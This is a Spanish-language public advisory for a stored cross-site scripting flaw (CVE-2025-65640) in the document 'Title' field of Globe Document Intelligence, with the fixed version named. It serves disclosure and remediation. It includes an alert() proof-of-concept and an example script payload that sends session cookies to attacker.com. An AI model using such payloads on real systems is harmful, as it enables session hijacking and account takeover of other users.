
Aviso público para CVE-2025-65640: Vulnerabilidad de XSS almacenado en Globe Document Intelligence.
Se identificó una vulnerabilidad de Stored Cross-Site Scripting (XSS) en la plataforma Globe Document Intelligence (versión 5.0.0.559). La aplicación no sanitiza ni codifica adecuadamente la entrada proporcionada por el usuario en la propiedad "Title" de un documento recién creado. Cuando un usuario autenticado navega a las páginas de resumen (por ejemplo, "Task in progress / Recent"), la carga maliciosa se refleja y ejecuta en el contexto del navegador de la víctima.
Esta vulnerabilidad permite a un atacante autenticado almacenar código JavaScript malicioso en el servidor. Cuando otros usuarios autenticados (incluyendo cuentas administrativas) visualizan las páginas afectadas, el script se ejecuta automáticamente. Si bien la Prueba de Concepto a continuación demuestra la vulnerabilidad usando un alert() benigno, un atacante puede explotar esta falla para lograr el Secuestro de Sesión y la Toma de Control de la Cuenta. Por ejemplo, inyectar una carga útil como <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> exfiltraría silenciosamente las cookies de sesión de la víctima a un servidor externo controlado por el atacante.
Para reproducir la vulnerabilidad, un atacante autenticado puede seguir estos pasos:
<script>alert("XSS")</script>Según el vendedor, esta vulnerabilidad ha sido solucionada en la versión 5.1.0.575. Para remediar este problema, se recomienda actualizar la plataforma Globe Document Intelligence a la versión 5.1.0.575.
Esta Prueba de Concepto (PoC) se proporciona exclusivamente con fines educativos y de investigación. La información y el código detallados en este documento no deben ser utilizados para actividades maliciosas ni contra ningún sistema sin la autorización explícita y previa de los propietarios del sistema. El autor no asume ninguna responsabilidad y no se hace responsable por cualquier mal uso o daño causado por la aplicación del material proporcionado.